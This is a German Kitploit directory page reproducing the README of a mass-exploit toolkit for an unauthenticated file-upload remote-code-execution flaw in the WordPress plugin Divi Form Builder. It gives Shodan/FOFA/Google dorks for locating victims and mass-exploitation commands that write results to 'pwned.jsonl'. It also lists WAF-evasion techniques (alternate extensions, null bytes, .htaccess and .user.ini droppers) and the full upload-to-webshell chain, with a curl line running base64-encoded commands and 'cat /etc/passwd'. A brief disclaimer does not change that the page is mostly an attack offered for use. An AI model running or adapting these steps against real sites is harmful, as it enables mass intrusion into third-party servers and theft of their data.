Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5524-PoC — Massives Exploit-Toolkit für CVE-2026-5524, eine nicht authentifizierte Datei-Upload-RCE in Divi Form Builder. Bietet Multithread-Scanning, WAF-Umgehungstechniken, benutzerdefinierte Webshell-Bereitstellung und interaktive Befehlsausführung. | Kitploit
Tools/GitHubGitHub/caterscam/cve-2026-5524-poc
AufklärungSchwachstellenscannerExploitationShellcodeWebanwendungs-ExploitationInformationsbeschaffungWAF-UmgehungPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
Payload-Entwicklung
GitHubcaterscam/cve-2026-5524-poc

CVE-2026-5524-PoC

Massives Exploit-Toolkit für CVE-2026-5524, eine nicht authentifizierte Datei-Upload-RCE in Divi Form Builder. Bietet Multithread-Scanning, WAF-Umgehungstechniken, benutzerdefinierte Webshell-Bereitstellung und interaktive Befehlsausführung.

Repository anzeigen
114vor 2 MonatenNoch nicht geprüft
Teilen

CVE-2026-5524 — Nicht authentifizierte RCE im Divi Form Builder

Massives Exploit-Toolkit für CVE-2026-5524, eine nicht authentifizierte Schwachstelle zum Hochladen beliebiger Dateien im WordPress-Plugin Divi Form Builder <= 5.1.8, die zu Remote-Code-Ausführung führt.

version Devon Aji python telegram

FeldWert
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedDivi Form Builder <= 5.1.8
Patched5.1.9
TypeUnauthenticated File Upload to RCE
Researcher0xd4rk5id3 - EnvoraSec

Inhaltsverzeichnis

  • Beschreibung
  • Dorks
  • Installation
  • Verwendung
    • Einzelnes Ziel
    • Massenexploit
    • Erweiterte Umgehung
    • Befehlsausführung
  • Schwachstellendetails
  • Umgehungstechniken
  • Technologiestapel
  • Projektstruktur
  • Angriffsablauf
  • Haftungsausschluss

Beschreibung

Das Divi Form Builder Plugin für WordPress enthält eine nicht authentifizierte Schwachstelle zum Hochladen beliebiger Dateien. Der Handler do_image_upload() übergibt den vom Benutzer kontrollierten POST-Parameter acceptFileTypes direkt in einen regulären Ausdruck zur Validierung von Dateierweiterungen. Durch die Angabe eines Werts wie phtml kann ein Angreifer die .htaccess-Regel des Plugins umgehen, die nur die Erweiterung .php blockiert, und eine Webshell mit einer PHP-ausführbaren Erweiterung (.phtml, .phar, .php5, .php7 und ähnliche) hochladen.

Sobald die Datei in /wp-content/uploads/de_fb_uploads/ landet, führt Apache sie als PHP aus, was dem Angreifer Remote-Code-Ausführung als Web-Server-Benutzer gewährt.

Das Problem ist in Divi Form Builder 5.1.9 behoben.


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

Installation

Voraussetzungen: Python 3.8 oder neuer unter Linux, macOS oder WSL.

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Verwendung

Einzelnes Ziel

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

Massenexploit

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Erweiterte Umgehung

Für Ziele hinter einer WAF (NinjaFirewall, Wordfence, ModSecurity) oder mit gehärteter Apache- oder nginx-Konfiguration.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Befehlsausführung

Nach einem erfolgreichen Upload kann das Skript sofort einen Befehl ausführen oder in eine interaktive Shell wechseln.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Flags

FlagBeschreibung
-u URLEinzelne Ziel-URL
-l DATEIDatei mit Zielliste, eine URL pro Zeile
-t NAnzahl gleichzeitiger Threads (Standard 10)
--timeout NTimeout für Anfragen in Sekunden (Standard 15)
-o DATEIErgebnisse in JSONL-Datei speichern
--proxy URLDatenverkehr über HTTP-Proxy leiten
--nonce HASHManuell angegebenen Nonce verwenden, automatische Erkennung überspringen
--ext EXTEinzelne Erweiterung erzwingen, statt der vollständigen Bypass-Liste
--shellIn interaktive RCE-Shell wechseln (nur einzelnes Ziel)
--cmd BEFEHLEinen Befehl auf dem Ziel ausführen, dann beenden
--shell-file DATEIBenutzerdefinierte Shell-Payload hochladen statt der integrierten
--no-verifySchritt der Post-Upload-RCE-Überprüfung überspringen
--strict-verifyShell-URL auf HTTP-200 prüfen, um Fehlalarme zu filtern
--user-ini.user.ini-Dropper für PHP-FPM-Umgebungen hochladen
--htaccess.htaccess-Reaktivierer für Apache-Umgebungen hochladen
--aggressiveJede verfügbare Umgehungstechnik aktivieren
--null-byteNull-Byte und Doppelerweiterungsversuche einschließen
--path-traversalHochladen in /uploads/YYYY/MM/-Unterverzeichnisse versuchen
--debugRoh-HTTP-Antworten zur Diagnose ausgeben

Schwachstellendetails

Verwundbarer Code

Der verwundbare Handler erstellt einen Regex aus Benutzereingaben ohne Bereinigung.

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

Durch das Senden von acceptFileTypes=phtml stimmt der resultierende Regex /\.(phtml)$/i mit Dateinamen überein, die auf .phtml enden, obwohl die eigene .htaccess-Datei des Plugins nur die Erweiterung .php blockiert. Apache führt dann die hochgeladene Datei als PHP aus, was zu Remote-Code-Ausführung führt.

Bestätigte Angriffskette

  1. Durchsuchen Sie eine Seite, die ein Divi Form Builder-Formular einbettet (/, /contact, /quote, usw.). Fügen Sie einen Parameter ?nocache=<zufall> hinzu, um Varnish, WP Rocket und andere Seiten-Caches zu umgehen, die sonst einen veralteten Nonce ausliefern würden.

  2. Extrahieren Sie den Wert von fb_nonce aus dem lokalisierten JavaScript-Objekt:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 Hex-Zeichen>", ...}
    
  3. Senden Sie ein multipart-Formular per POST an /wp-admin/admin-ajax.php mit:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. Lesen Sie die Datei-URL aus der JSON-Antwort:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. Fordern Sie die Shell mit einem base64-codierten Befehl an:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Umgehungstechniken

#TechnikZiele
1Alternative PHP-Erweiterungen .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlPlugin-.htaccess-Regel, die nur .php blockiert
2Variierte Groß-/Kleinschreibung .PHTML, .PHP5, .PhTmLGroß-/Kleinschreibung-sensitive WAF-Signaturen (NinjaFirewall)
3Doppelerweiterung .phtml.jpg, .php.jpgApache mod_mime-Inhaltsverhandlungs-Probleme
4Null-Byte .php%00.jpg, .phtml%00.txtAlte PHP-Versionen (kleiner als 5.3.4) und bestimmte Parser
5Nachgestelltes Leerzeichen oder Punkt .php , .php.Windows IIS und ältere Apache-Versionen
6Content-Type-Spoofing application/octet-streamWAFs, die auf den multipart-Content-Type-Header achten
7Echtes .htaccess hochladen, das PHP für .gif, .png, .jpg, .txt, .html usw. reaktiviertApache-Server mit AllowOverride All
8.user.ini mit auto_prepend_file hochladenPHP-FPM-Umgebungen
9Dateinamen-Injektion durch multipart-Grenz-ManipulationProxies und WAFs, die den Anforderungstext neu parsen
10Path Traversal ../shell.phtml im DateinamenPlugin-Verzeichnisbeschränkungen

Das Skript probiert jede Technik in Prioritätsreihenfolge und versucht bei --aggressive jede, selbst wenn der erste Upload erfolgreich gemeldet wurde.


Technologiestapel

Exploit-Skript

KomponenteTechnologie
SprachePython 3.8+
HTTP-Clientrequests
TLS-Handhabungurllib3 im unsicheren Modus für selbstsignierte Zertifikate
Nebenläufigkeitconcurrent.futures.ThreadPoolExecutor für Massenscans
Parsingre für Nonce-Extraktion, json für Antwortverarbeitung
Kodierungbase64 für Webshell-Befehlsparameter
CLIargparse mit 19 konfigurierbaren Flags

Benutzerdefinierte Shell (bypass.phtml)

KomponenteTechnologie
SprachePHP 7.0+
Ausführungsfunktionensystem(), shell_exec(), proc_open(), passthru(), popen()
FrontendReines HTML-Formular, kein JavaScript-Framework
FunktionenDateibrowser, Befehlsausführung, Datenbankzugriff, Reverse Shell, selbstinstallierende .htaccess und .user.ini
GrößeUngefähr 16 KB
UmgehungsebenenSechs unabhängige Ausführungspfade plus codierte Payloads

Projektstruktur

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Haupt-Exploit-Skript
|-- bypass.phtml              16 KB mehrschichtige PHP-Webshell
|-- htaccess_enable.phtml     Dropper, der reaktivierendes .htaccess schreibt
|-- user_ini.phtml            Dropper, der .user.ini für PHP-FPM schreibt
|-- targets.txt               Beispiel-Zielliste
|-- pwned.jsonl               Von der -o-Flag bei Massenscans erzeugt
|-- requirements.txt          Python-Abhängigkeiten
`-- README.md                 Dieses Dokument

Angriffsablauf

root@kitploit:~
+--------------------------------------------------+
| 1. Aufklaerung                                    |
|    GET /?nocache=<zufall>                         |
|    Extrahiere fb_nonce aus de_fb_obj              |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Exploit erstellen                              |
|    POST /wp-admin/admin-ajax.php                  |
|    action=de_fb_image_upload                      |
|    acceptFileTypes=phtml                          |
|    [email protected]                              |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Server akzeptiert und speichert Datei          |
|    /uploads/de_fb_uploads/<zufall>.phtml          |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Ausfuehren                                     |
|    GET shell.phtml?x=base64(Befehl)               |
|    Remote-Code-Ausfuehrung erreicht               |
+--------------------------------------------------+

Haftungsausschluss

Dieses Tool wird zu Bildungszwecken und für den Einsatz während autorisierter Penetrationstests bereitgestellt. Beispiele für akzeptable Nutzung sind:

  • Bug-Bounty-Programme, die das Testen des Ziels ausdrücklich erlauben
  • Capture-the-Flag-Wettbewerbe und dedizierte Laborumgebungen
  • Interne Sicherheitsbewertungen mit schriftlicher Genehmigung des Asset-Eigentümers
  • Akademische Sicherheitsforschung in kontrollierter Umgebung

Die nicht autorisierte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, ist in praktisch jeder Rechtsordnung illegal und strengstens untersagt. Der Autor billigt keinen Missbrauch dieses Codes und übernimmt keine Verantwortung dafür.

J'ai la permission et je suis autorisé à effectuer ce pentest. (Ich habe die Erlaubnis und bin autorisiert, diesen Pentest durchzuführen.)

Gesetze von wahrscheinlicher Relevanz umfassen Indonesiens UU ITE, den US Computer Fraud and Abuse Act, die Cybercrime-Konvention der Europäischen Union und entsprechende Gesetze andernorts. Im Zweifelsfall holen Sie zuerst eine schriftliche Autorisierung ein.


Lizenz

Nur für Bildungszwecke. Siehe den Haftungsausschluss für die vollständigen Nutzungsbedingungen.

Tool herunterladen